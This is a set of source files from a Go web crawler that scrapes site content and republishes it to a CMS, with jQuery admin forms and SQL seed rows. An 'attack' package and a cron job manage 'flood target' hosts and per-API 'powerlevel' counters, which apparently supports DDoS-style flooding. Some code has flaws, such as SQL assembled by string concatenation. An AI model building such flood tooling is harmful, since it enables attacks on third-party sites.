manager.Result, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Result")))
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
		log.Printf("session store type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `update spider_manager set name = ?, queue_name_json = ?, status = ?
where id = ? and uid = ?`
	stmtIn, err := db.Prepare(sqlStr)
	if err != nil {
		log.Printf("db prepare fails %s", err)
		rs, _ := json.Marshal(s)
		return http.StatusOK, string(rs)
	}
	defer stmtIn.Close()
if js, err = json.Marshal(manager.QueueName); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if _, err = stmtIn.Exec(manager.Name, js, manager.Status, manager.Id, spUser.Id); err != nil {
log.Printf("update spider fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
func AddSpider(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
manager Manager
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&manager).Elem()
rValue := reflect.ValueOf(&manager).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
				log.Printf("unknown type %s", p)
}
}
}
manager.Task, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Task")))
manager.Result, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Result")))
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
		log.Printf("session store type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `insert into spider_manager(uid, name, queue_name_json, logtime)
values(?, ?, ?, ?)`
stmtIn, err := db.Prepare(sqlStr)
defer stmtIn.Close()
if err != nil {
log.Printf("db prepare fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if js, err = json.Marshal(manager.QueueName); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if _, err := stmtIn.Exec(spUser.Id, manager.Name, string(js), time.Now().Format("2006-01-02 15:04:05")); err != nil {
log.Printf("stmtIn exec fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
func GetSpiders(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
cfg *common.Cfg, session sessions.Session, ms []*user.SpStatMenu, render render.Render) {
var (
spiderRelation *SpiderRelation
spiderRelations []*SpiderRelation
menu []*user.SpStatMenu
spUser user.SpStatUser
con string
totalN int64
destPn int64
)
path := r.URL.Path
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
		log.Printf("session store type error")
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = "WHERE a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ")"
case user.GROUP_PRI_BAN:
con = "WHERE a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ")"
default:
		log.Printf("group privilege rule error")
}
for _, elem := range ms {
if (spUser.Role.Menu & elem.Id) == elem.Id {
menu = append(menu, elem)
}
}
stmtOut, err := db.Prepare("SELECT COUNT(*) FROM spider_manager a " + con)
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
row := stmtOut.QueryRow()
if err = row.Scan(&totalN); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
//page
if r.URL.Query().Get("p") != "" {
destPn, _ = strconv.ParseInt(r.URL.Query().Get("p"), 10, 64)
} else {
destPn = 1
}
sqlStr := `select a.id, a.uid, b.username, a.name, a.queue_name_json, a.status, a.logtime
from spider_manager a left join sp_user b on a.uid = b.id
	` + con + ` order by id desc limit ?, ?`
log.Printf("%s", sqlStr)
	stmtOut.Close()
	stmtOut, err = db.Prepare(sqlStr)
	if err != nil {
		log.Printf("%s", err)
		http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
		return
	}
	defer stmtOut.Close()
	rows, err := stmtOut.Query(cfg.PageSize*(destPn-1), cfg.PageSize)
	if err != nil {
		log.Printf("%s", err)
		http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
		return
	}
	defer rows.Close()
for rows.Next() {
spiderRelation = &SpiderRelation{}
if err := rows.Scan(&spiderRelation.Manager.Id,&spiderRelation.Manager.Uid,
&spiderRelation.UserName, &spiderRelation.Name, &spiderRelation.QueueNameStr,
&spiderRelation.Manager.Status, &spiderRelation.Manager.Logtime); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
if err := json.Unmarshal([]byte(spiderRelation.QueueNameStr), &spiderRelation.QueueName); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
spiderRelations = append(spiderRelations, spiderRelation)
}
paginator := util.NewPaginator(r, cfg.PageSize, totalN)
ret := struct {
Menu []*user.SpStatMenu
Result []*SpiderRelation
Paginator *util.Paginator
User *user.SpStatUser
}{menu, spiderRelations, paginator, &spUser}
if path == "/" {
render.HTML(200, "spiderview", ret)
} else {
index := strings.LastIndex(path, "/")
render.HTML(200, path[index+1:], ret)
}
}

package attack
import (
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
"encoding/json"
"github.com/huzorro/ospider/util"
"net"
)
type UpdateHost struct {
cfg common.Ospider
}
func NewUpdateHost(co common.Ospider) *UpdateHost {
return &UpdateHost{cfg:co}
}
func (self *UpdateHost) Process(payload string) {
var (
attack handler.FloodTarget
)
self.cfg.Log.Println("update host...")
if err := json.Unmarshal([]byte(payload), &attack); err != nil {
self.cfg.Log.Printf("json Unmarshal fails %s", err)
return
}
sqlStr := `update spider_flood_target set host = ? where url = ? and status = 1`
	stmtIn, err := self.cfg.Db.Prepare(sqlStr)
	if err != nil {
		self.cfg.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
		return
	}
	defer stmtIn.Close()
ip, err := util.LookupHost(attack.Url)
if err != nil {
self.cfg.Log.Println("lookup host fails for api")
ips, err := net.LookupIP(attack.Url)
if err == nil {
if ips[0].String() != "127.0.0.1" {
attack.Host = ips[0].String()
}
}
} else {
attack.Host = ip
}
self.cfg.Log.Printf("lookup host %s", attack.Host)
_, err = stmtIn.Exec(attack.Host, attack.Url)
if err != nil {
self.cfg.Log.Printf("update flood target host fails %s", err)
return
}
}
package cms
import (
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
"encoding/json"
)
type CommitMysql struct {
common.Ospider
}
func NewCommitMysql(co common.Ospider) *CommitMysql {
return &CommitMysql{co}
}
func (self *CommitMysql) Process(payload string) {
var (
site handler.Site
)
if err := json.Unmarshal([]byte(payload), &site); err != nil {
self.Log.Printf("json Unmarshal fails %s", err)
return
}
sqlStr := `insert into spider_history (uid, siteid, url, result_json)
values(?, ?, ?, ?)`
	stmtIn, err := self.Db.Prepare(sqlStr)
	if err != nil {
		self.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
		return
	}
	defer stmtIn.Close()
if _, err := stmtIn.Exec(site.Uid, site.Id, site.Rule.Url, payload); err != nil {
self.Log.Printf("stmtIn.Exec() fails %s", err)
return
}
}
$(function() {
$("input[name=Url]").change(function () {
console.log($("input[name=Url]").val());
// var htmls = [];
$.ajax({
url:$(this).val() + "/api/category",
type:"get",
cache:false,
dataType:"json",
success:function(result) {
var htmls = [];
// htmls.push($("select[name=Category]").html());
$.each(result.data, function(key, value){
htmls.push("<option value=" + JSON.stringify(value) + ">" + value.title + "</option>");
});
$("select[name=Category]").html(htmls.join(""));
}
});
$.ajax({
url:$(this).val() + "/api/member",
type:"get",
cache:false,
dataType:"json",
success:function(result) {
// htmls.push($("select[name=Category]").html());
var htmls = [];
$.each(result.data, function(key, value){
htmls.push("<option value=" + JSON.stringify(value) + ">" + value.nickname + "</option>");
});
$("select[name=Member]").html(htmls.join(""));
}
});
$.ajax({
url:"/api/rules",
type:"post",
cache:false,
dataType:"json",
success:function(result) {
// htmls.push($("select[name=Category]").html());
var htmls = [];
$.each(result, function(key, value){
htmls.push("<option value=" + value.id + ">" + value.name + "</option>");
});
$("select[name=RuleId]").html(htmls.join(""));
}
});
$.ajax({
url:"/api/crontabs",
type:"post",
cache:false,
dataType:"json",
success:function(result) {
// htmls.push($("select[name=Category]").html());
var htmls = [];
$.each(result, function(key, value){
htmls.push("<option value=" + value.id + ">" + value.name + "</option>");
});
$("select[name=CronId]").html(htmls.join(""));
}
});
})
$("#add").click(function() {
// console.log("Spiderid" + $("select[name=SpiderId]").val());
var arr = [];
$("input[name=Position]:checked").each(function(){
arr.push(parseInt($(this).val()));
});
var category = JSON.parse($("select[name=Category]").val());
var member = JSON.parse($("select[name=Member]").val());
$.ajax({
url : "/site/add",
data : {Name:$("input[name=Name]").val(),
Url:$("input[name=Url]").val(), Category:category.id,
CategoryTitle:category.title,
ModelId:category.model, GroupId:$("input[name=GroupId]").val(),
Member:member.uid, NickName:member.nickname,
				Position:arr.reduce(function(a, b){return a + b;}, 0),
Display:$("input[name=Display]:checked").val(), Check:$("input[name=Check]:checked").val(),
RuleId:$("select[name=RuleId]").val(), CronId:$("select[name=CronId]").val()
},
type : "post",
cache : false,
dataType : "json",
success: commonInfo
});
});
$("button[name=operate]").click(function() {
console.log($(this).val() + "Abc");
$.ajax({
url : "/site/one",
data : {Id:$(this).val()},
type : "post",
cache : false,
dataType : "json",
success: one
});
});
$("#edit").click(function() {
var arr = [];
$("input[name=Position_edit]:checked").each(function(){
arr.push(parseInt($(this).val()));
});
var category = JSON.parse($("#Category").val());
var member = JSON.parse($("#Member").val());
$.ajax({
url : "/site/edit",
data : {Id:$("#Id").val(), Name:$("#Name").val(),
Url:$("#Url").val(), Category:category.id,
CategoryTitle:category.title,
ModelId:category.model,
Member:member.uid, NickName:member.nickname,
				Position:arr.reduce(function(a, b){return a + b;}, 0),
Display:$("input[name=Display_edit]:checked").val(), Check:$("input[name=Check_edit]:checked").val(),
RuleId:$("#RuleId").val(), CronId:$("#CronId").val(),
Status:$("input[name=Status]:checked").val()
},
type : "post",
cache : false,
dataType : "json",
success: commonInfo
});
});
$("#infoModal .btn").click(function(){
location.reload();
});
$("#close").click(function(){
location.reload();
});
});
function commonInfo(json) {
if (json.status !== undefined) {
$('#infoModal').modal('toggle');
$('#infoModal p').text(json.text);
// location.reload();
return
}
}
function one(json) {
console.log(json);
$('#editRuleModal').modal('toggle');
if (json.status !== undefined && json.text !== undefined) {
$("#Status").html(json.text);
} else {
var htmls = [];
$("#Id").val(json.id);
$("#Name").val(json.name);
$("#Url").val(json.url);
//
$.ajax({
url:json.url + "/api/category",
type:"get",
cache:false,
dataType:"json",
success:function(result) {
var htmls = [];
// htmls.push($("select[name=Category]").html());
$.each(result.data, function(key, value){
htmls.push("<option value=" + JSON.stringify(value) + ">" + value.title + "</option>");
});
$("#Category").html(htmls.join(""));
$("#Category>option").each(function() {
if($(this).text() == json.document_set.title) {
$(this).attr("selected","selected");
}
});
}
});
$.ajax({
url:json.url + "/api/member",
type:"get",
cache:false,
dataType:"json",
success:function(result) {
// htmls.push($("select[name=Category]").html());
var htmls = [];
$.each(result.data, function(key, value){
htmls.push("<option value=" + JSON.stringify(value) + ">" + value.nickname + "</option>");
});
$("#Member").html(htmls.join(""));
$("#Member>option").each(function() {
if($(this).text() == json.document_set.nickname) {
$(this).attr("selected","selected");
}
});
}
});
$.ajax({
url:"/api/rules",
type:"post",
cache:false,
dataType:"json",
success:function(result) {
// htmls.push($("select[name=Category]").html());
var htmls = [];
$.each(result, function(key, value){
htmls.push("<option value=" + value.id + ">" + value.name + "</option>");
});
$("#RuleId").html(htmls.join(""));
$("#RuleId>option").each(function() {
if($(this).text() == json.Rule.name) {
$(this).attr("selected","selected");
}
});
}
});
$.ajax({
url:"/api/crontabs",
type:"post",
cache:false,
dataType:"json",
success:function(result) {
// htmls.push($("select[name=Category]").html());
var htmls = [];
$.each(result, function(key, value){
htmls.push("<option value=" + value.id + ">" + value.name + "</option>");
});
$("#CronId").html(htmls.join(""));
$("#CronId>option").each(function() {
if($(this).text() == json.Cron.name) {
$(this).attr("selected","selected");
}
});
}
});
$("input[name=Position_edit]").each(function(){
if(($(this).val() & json.document_set.position) == $(this).val()) {
$(this).attr("checked","checked");
}
});
$("input[name=Display_edit]").each(function(){
if($(this).val() == json.document_set.display) {
$(this).attr("checked","checked");
}
});
$("input[name=Check_edit]").each(function(){
if($(this).val() == json.document_set.check) {
$(this).attr("checked","checked");
}
});
if (json.status) {
htmls.push('<input type="radio" name="Status" value=0 >停用<input type="radio" name="Status" value=1 checked>启用');
} else {
htmls.push('<input type="radio" name="Status" value=0 checked>停用<input type="radio" name="Status" value=1 >启用');
}
$("#Status").html(htmls.join(""));
}
}
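site.js combines the checked Position checkboxes by summing their values; because the values are distinct powers of two, the sum equals a bitwise OR, and the edit form recovers each checkbox with `(val & position) == val`. A Go sketch of that round trip (the flag values are illustrative):

```go
package main

import "fmt"

// combine ORs a set of power-of-two flags into one position value;
// for distinct powers of two this equals summing them, which is what
// the JavaScript side does.
func combine(flags []int) int {
	pos := 0
	for _, f := range flags {
		pos |= f
	}
	return pos
}

// checked reproduces the edit-form test (val & position) == val.
func checked(pos, flag int) bool { return pos&flag == flag }

func main() {
	pos := combine([]int{1, 4, 16})
	fmt.Println(pos, checked(pos, 4), checked(pos, 2))
}
```

Note the equivalence between sum and OR breaks if the same flag is counted twice, which the checkbox UI prevents.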
package processor
import (
"encoding/json"
"fmt"
"time"
"github.com/adjust/rmq"
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
)
type Task struct {
Cfg
common.Ospider
rmq.Connection
}
type Consumer struct {
name string
count int
before time.Time
task Task
}
func NewConsumer(tag int, task Task) *Consumer {
return &Consumer{
name: fmt.Sprintf("consumer%d", tag),
count: 0,
before: time.Now(),
task: task,
}
}
func (consumer *Consumer) Consume(delivery rmq.Delivery) {
var (
site handler.Site
linkQueue rmq.Queue
err error
)
consumer.count++
linkQueue = consumer.task.Connection.OpenQueue(consumer.task.Cfg.LinkQueueName)
consumer.task.Log.Printf("%s consumed %d %s", consumer.name, consumer.count, delivery.Payload())
if err = json.Unmarshal([]byte(delivery.Payload()), &site); err != nil {
consumer.task.Log.Printf("json Unmarshal fails %s", err)
delivery.Ack()
return
}
attach := make(map[string]interface{})
attach["site"] = site
spider, ext := NewSpiderLink(consumer.task.Cfg, attach)
if err := spider.Run(site.Rule.Url); err != nil {
links := ext.Attach["links"].([]string)
for _, v := range links {
site.Rule.Url = v
if siteStr, err := json.Marshal(site); err != nil {
consumer.task.Log.Printf("json Marshal fails %s", err)
} else {
linkQueue.Publish(string(siteStr))
}
}
}
delivery.Ack()
}
func (self Task) Handler() {
var (
taskQueue rmq.Queue
)
taskQueue = self.Connection.OpenQueue(self.Cfg.TaskQueueName)
taskQueue.StartConsuming(self.UnackedLimit, 500*time.Millisecond)
for i := 0; i < self.NumConsumers; i++ {
name := fmt.Sprintf("consumer %d", i)
taskQueue.AddConsumer(name, NewConsumer(i, self))
}
}
package processor
import (
"encoding/json"
"fmt"
"time"
"strings"
"github.com/adjust/rmq"
"github.com/gosexy/redis"
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
)
type TaskContent struct {
Cfg
common.Ospider
rmq.Connection
}
type ConsumerContent struct {
name string
count int
before time.Time
content TaskContent
}
func NewConsumerLink(tag int, task TaskContent) *ConsumerContent {
return &ConsumerContent{
name: fmt.Sprintf("consumer%d", tag),
count: 0,
before: time.Now(),
content: task,
}
}
func (consumer *ConsumerContent) Consume(delivery rmq.Delivery) {
var (
site handler.Site
resultQueue rmq.Queue
err error
)
consumer.count++
resultQueue = consumer.content.Connection.OpenQueue(consumer.content.Cfg.ResultQueueName)
consumer.content.Log.Printf("%s consumed %d %s", consumer.name, consumer.count, delivery.Payload())
if err = json.Unmarshal([]byte(delivery.Payload()), &site); err != nil {
consumer.content.Log.Printf("json Unmarshal fails %s", err)
delivery.Ack()
return
}
attach := make(map[string]interface{})
attach["site"] = site
	// look up the crawl history
var (
redisClient *redis.Client
reviewStr string
review handler.Site
)
	if redisClient, err = consumer.content.Ospider.P.Get(); err != nil {
		consumer.content.Log.Printf("get redis client fails %s", err)
		delivery.Ack()
		return
	}
	defer consumer.content.Ospider.P.Close(redisClient)
if reviewStr, err = redisClient.Get(site.Rule.Url); err != nil {
		consumer.content.Log.Printf("no history data found in review cache for key:%s", site.Rule.Url)
spider, ext := NewSpiderContent(consumer.content.Cfg, attach)
if err := spider.Run(site.Rule.Url); err != nil {
consumer.content.Log.Printf("spider find content fails %s", err)
site = ext.Attach["site"].(handler.Site)
if siteStr, err := json.Marshal(site); err != nil {
consumer.content.Log.Printf("site Marshal fails %s", err)
} else {
resultQueue.Publish(string(siteStr))
				// write the crawl history record to redis
				if redisClient, err := consumer.content.Ospider.P.Get(); err != nil {
					consumer.content.Log.Printf("get redis client fails %s", err)
				} else {
					defer consumer.content.Ospider.P.Close(redisClient)
					redisClient.Set(site.Rule.Url, string(siteStr))
					redisClient.Expire(site.Rule.Url, 60*60*48)
				}
}
}
} else {
if err = json.Unmarshal([]byte(reviewStr), &review); err != nil {
consumer.content.Log.Printf("json Unmarshal fails %s", err)
} else {
if (review.Id & site.Id) != site.Id {
site.Rule.Selector.Title = review.Rule.Selector.Title
site.Rule.Selector.Content = review.Rule.Selector.Content
if siteStr, err := json.Marshal(site); err != nil {
consumer.content.Log.Printf("site Marshal fails %s", err)
} else {
resultQueue.Publish(string(siteStr))
}
				// update the review record's id and url
review.Id |= site.Id
review.Url += site.Url
if reviewBytes, err := json.Marshal(review); err != nil {
consumer.content.Log.Printf("site Marshal fails %s", err)
} else {
redisClient.Set(site.Rule.Url, string(reviewBytes))
redisClient.Expire(site.Rule.Url, 60*60*consumer.content.CacheExpire)
}
} else if !strings.Contains(review.Url, site.Url) {
site.Rule.Selector.Title = review.Rule.Selector.Title
site.Rule.Selector.Content = review.Rule.Selector.Content
if siteStr, err := json.Marshal(site); err != nil {
consumer.content.Log.Printf("site Marshal fails %s", err)
} else {
resultQueue.Publish(string(siteStr))
}
				// update the review record's id and url
review.Id |= site.Id
review.Url += site.Url
if reviewBytes, err := json.Marshal(review); err != nil {
consumer.content.Log.Printf("site Marshal fails %s", err)
} else {
redisClient.Set(site.Rule.Url, string(reviewBytes))
redisClient.Expire(site.Rule.Url, 60*60*consumer.content.CacheExpire)
}
}
}
}
delivery.Ack()
}
func (self TaskContent) Handler() {
var (
linkQueue rmq.Queue
)
linkQueue = self.Connection.OpenQueue(self.Cfg.LinkQueueName)
linkQueue.StartConsuming(self.UnackedLimit, 500*time.Millisecond)
for i := 0; i < self.NumConsumers; i++ {
name := fmt.Sprintf("consumer %d", i)
linkQueue.AddConsumer(name, NewConsumerLink(i, self))
}
}
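`ConsumerContent.Consume` republishes a cached page when the site's id bit is missing from `review.Id`, or when the id bit is present but the url is not yet contained in `review.Url`; in either case it then folds the site into the review with `review.Id |= site.Id` and `review.Url += site.Url`. A sketch isolating that decision (the ids and urls below are made up):

```go
package main

import (
	"fmt"
	"strings"
)

// shouldPublish mirrors the two publish branches in ConsumerContent.Consume:
// publish when the site's id bit is not yet in the review bitmask, or when
// the site's url has not been appended to the review url list.
func shouldPublish(reviewId, siteId int64, reviewUrl, siteUrl string) bool {
	if reviewId&siteId != siteId {
		return true // id bit missing from the review record
	}
	return !strings.Contains(reviewUrl, siteUrl)
}

func main() {
	fmt.Println(shouldPublish(3, 4, "a.com;", "b.com"))         // id bit missing
	fmt.Println(shouldPublish(7, 4, "a.com;b.com;", "b.com"))   // already recorded
}
```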
package crontab
import (
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
cron "github.com/jakecoffman/cron"
"encoding/binary"
)
type Rest struct {
common.Ospider
Cfg
}
func NewRest() *Rest {
return &Rest{}
}
func (self *Rest) Handler() {
c := cron.New()
subCron := cron.New()
subCron.Start()
self.Log.Println(self.RestCron)
c.AddFunc(self.RestCron, func() {
var (
api handler.FloodApi
powerlevel uint32
time uint32
)
self.Log.Println("rest powerlevel and time...")
sqlStr := `select id, name, api, powerlevel, time
from spider_flood_api where status = 1`
stmtOut, err := self.Db.Prepare(sqlStr)
if err != nil {
	self.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
	return
}
defer stmtOut.Close()
rows, err := stmtOut.Query()
if err != nil {
	self.Log.Printf("stmtOut.Query fails %s", err)
	return
}
defer rows.Close()
for rows.Next() {
err = rows.Scan(&api.Id, &api.Name, &api.Api, &api.Powerlevel, &api.Time)
if err != nil {
self.Log.Printf("rows.Scan (%s) fails %s", sqlStr, err)
return
}
// powerlevel and time appear to pack a configured default (high 32 bits) and a
// current value (low 32 bits) into one uint64; resetting copies the high half
// into both halves.
var powerlevelBuf = make([]byte, 8)
binary.BigEndian.PutUint64(powerlevelBuf, uint64(api.Powerlevel))
powerlevel = binary.BigEndian.Uint32(powerlevelBuf[:4])
var timeBuf = make([]byte, 8)
binary.BigEndian.PutUint64(timeBuf, uint64(api.Time))
time = binary.BigEndian.Uint32(timeBuf[:4])
sqlStr = `update spider_flood_api set time = ?, powerlevel = ? where id = ?`
stmtIn, err := self.Db.Prepare(sqlStr)
if err != nil {
	self.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
	return
}
defer stmtIn.Close()
binary.BigEndian.PutUint32(powerlevelBuf[:4], powerlevel)
binary.BigEndian.PutUint32(powerlevelBuf[4:], powerlevel)
binary.BigEndian.PutUint32(timeBuf[:4], time)
binary.BigEndian.PutUint32(timeBuf[4:], time)
newPowerlevel := binary.BigEndian.Uint64(powerlevelBuf)
newTime := binary.BigEndian.Uint64(timeBuf)
self.Log.Printf("powerlevel:%d-%d time:%d-%d", powerlevel, newPowerlevel, time, newTime)
_, err = stmtIn.Exec(newTime, newPowerlevel, api.Id)
if err != nil {
self.Log.Printf("update flood api fails %s", err)
return
}
}}, "initTask")
c.Start()
}
<file_sep>package crontab
import (
"encoding/json"
"fmt"
"github.com/adjust/rmq"
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
cron "github.com/jakecoffman/cron"
)
type Cfg struct {
common.Cfg
FlushCron string `json:"flushCron"`
RestCron string `json:"restCron"`
}
type Task struct {
common.Ospider
Cfg
rmq.Queue
}
func New() *Task {
return &Task{}
}
func (self *Task) Handler() {
c := cron.New()
subCron := cron.New()
subCron.Start()
self.Log.Println(self.FlushCron)
c.AddFunc(self.FlushCron, func() {
sqlStr := `select a.id, a.uid, a.name, a.url, a.document_set,
a.ruleid, b.name, b.spiderid,b.url, b.rule_json,
a.cronid, c.name, c.cron, d.id, d.name, d.queue_name_json, a.status
from spider_site a left join spider_rule b on a.ruleid = b.id
left join spider_crontab c on a.cronid = c.id
left join spider_manager d on b.spiderid = d.id`
stmtOut, err := self.Db.Prepare(sqlStr)
if err != nil {
	self.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
	return
}
defer stmtOut.Close()
var (
site handler.Site
)
rows, err := stmtOut.Query()
if err != nil {
	self.Log.Printf("stmtOut.Query fails %s", err)
	return
}
defer rows.Close()
for rows.Next() {
if err := rows.Scan(&site.Id, &site.Uid, &site.Name, &site.Url, &site.DocumentSetStr, &site.Rule.Id,
&site.Rule.Name, &site.Rule.SpiderId, &site.Rule.Url, &site.Rule.SelectorStr,
&site.Crontab.Id, &site.Crontab.Name, &site.Crontab.Cron, &site.Rule.Manager.Id,
&site.Rule.Manager.Name, &site.Rule.Manager.QueueNameStr, &site.Status); err != nil {
self.Log.Printf("rows.Scan fails %s", err)
return
}
if err := json.Unmarshal([]byte(site.DocumentSetStr), &site.DocumentSet); err != nil {
self.Log.Printf("Unmarshal DocumentSetStr to DocumentSet fails %s", err)
return
}
if err := json.Unmarshal([]byte(site.Rule.SelectorStr), &site.Rule.Selector); err != nil {
self.Log.Printf("Unmarshal SelectorStr to Selector fails %s", err)
return
}
if err := json.Unmarshal([]byte(site.Rule.Manager.QueueNameStr), &site.Rule.Manager.QueueName); err != nil {
	self.Log.Printf("Unmarshal QueueNameStr to QueueName fails %s", err)
	return
}
siteJson, _ := json.Marshal(site)
subCron.RemoveJob(fmt.Sprintf("%d", site.Id))
if site.Status != 1 {
	continue
}
// capture per-iteration copies: the shared site var is overwritten by rows.Scan,
// so the closure must not read it directly
cronSpec := site.Crontab.Cron
payload := string(siteJson)
subCron.AddFunc(cronSpec, func() {
	self.Log.Println(cronSpec)
	self.Log.Printf("%s", payload)
	// push the task onto the redis-backed queue
	if !self.Publish(payload) {
		self.Log.Printf("put in task queue fails")
	}
}, fmt.Sprintf("%d", site.Id))
}
}, "initTask")
c.Start()
}
<file_sep>package cms
import (
"encoding/json"
"net/http"
"strings"
"time"
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
)
type CommitRestful struct {
common.Ospider
}
type Document struct {
Uid int64 `json:"uid"`
Title string `json:"title"`
Category int64 `json:"category_id"`
Group int64 `json:"group_id"`
Model int64 `json:"model_id"`
Position int64 `json:"position"`
Display int64 `json:"display"`
Status int64 `json:"status"`
Create int64 `json:"create_time"`
Update int64 `json:"update_time"`
}
type Article struct {
Id int64 `json:"id"`
Content string `json:"content"`
}
type DocumentArticle struct {
Document `json:"document"`
Article `json:"article"`
}
func NewCommitRestful(co common.Ospider) *CommitRestful {
return &CommitRestful{co}
}
func (self *CommitRestful) Process(payload string) {
var (
site handler.Site
documentArticle DocumentArticle
resultJson []byte
err error
)
if err = json.Unmarshal([]byte(payload), &site); err != nil {
self.Log.Printf("json Unmarshal fails %s", err)
return
}
// map the scraped selectors and document settings onto the CMS document
documentArticle.Article.Content = site.Rule.Selector.Content
documentArticle.Document.Category = site.DocumentSet.Category
documentArticle.Document.Display = site.DocumentSet.Display
documentArticle.Document.Group = site.DocumentSet.GroupId
documentArticle.Document.Model = site.DocumentSet.ModelId
documentArticle.Document.Position = site.DocumentSet.Position
documentArticle.Document.Status = site.DocumentSet.Check
documentArticle.Document.Title = site.Rule.Selector.Title
documentArticle.Document.Uid = site.Uid
documentArticle.Document.Create = time.Now().Unix()
documentArticle.Document.Update = time.Now().Unix()
if resultJson, err = json.Marshal(documentArticle); err != nil {
self.Log.Printf("json Marshal fails %s", err)
return
}
client := &http.Client{}
req, err := http.NewRequest("POST", site.Url+"/api/document/article", strings.NewReader(string(resultJson)))
if err != nil {
	self.Log.Printf("http.NewRequest fails %s", err)
	return
}
req.Header.Set("Content-Type", "application/json")
resp, err := client.Do(req)
if err != nil {
	self.Log.Printf("commit restful fails %s", err)
	return
}
defer resp.Body.Close()
self.Log.Printf("commit restful:[%d]:%s", resp.StatusCode, site.Url+"/api/document/article")
// example payload:
// {"document":{"uid":1,"title":"test112","category_id":42,"group_id":0,"model_id":2,"position":4,"display":1,"status":1},
//  "article":{"id":0,"content":"adfdsafsafsd"}}
}
<file_sep>/*
-- Query: SELECT * FROM ospider.sp_menu_template
LIMIT 0, 100
-- Date: 2016-06-20 10:20
*/
INSERT INTO `sp_menu_template` (`id`,`title`,`name`,`logtime`) VALUES (2,'API管理','floodapiview','2016-06-20 05:13:19');
INSERT INTO `sp_menu_template` (`id`,`title`,`name`,`logtime`) VALUES (2,'目标管理','floodtargetview','2016-06-20 05:13:19');
<file_sep>package processor
import (
"net/http"
"net/url"
"time"
"github.com/PuerkitoBio/gocrawl"
"github.com/PuerkitoBio/goquery"
"github.com/huzorro/ospider/crontab"
"github.com/huzorro/ospider/web/handler"
// "fmt"
"bytes"
"io/ioutil"
"golang.org/x/net/html/charset"
"golang.org/x/text/transform"
)
type Cfg struct {
crontab.Cfg
CrawlDelay int64 `json:"spiderDelaySecond"`
MaxVisits int `json:"maxVisits"`
UserAgent string `json:"userAgent"`
// concurrency control
ActorNums int64 `json:"actorNums"`
LinkQueueName string `json:"linkQueueName"`
}
type ExtLink struct {
Cfg
*gocrawl.DefaultExtender
Attach map[string]interface{}
}
func NewSpiderLink(cfg Cfg, attach map[string]interface{}) (*gocrawl.Crawler, *ExtLink) {
//attach := make(map[string]interface{})
ext := &ExtLink{cfg, &gocrawl.DefaultExtender{}, attach}
// fmt.Println(ext.Attach)
// Set custom options
opts := gocrawl.NewOptions(ext)
opts.CrawlDelay = 1 * time.Second
opts.LogFlags = gocrawl.LogAll
opts.SameHostOnly = true
opts.MaxVisits = cfg.MaxVisits
opts.UserAgent = cfg.UserAgent
return gocrawl.NewCrawlerWithOptions(opts), ext
}
func (e *ExtLink) Visit(ctx *gocrawl.URLContext, res *http.Response, doc *goquery.Document) (interface{}, bool) {
// detect the response charset
var (
body []byte
err error
)
if body, err = ioutil.ReadAll(res.Body); err != nil {
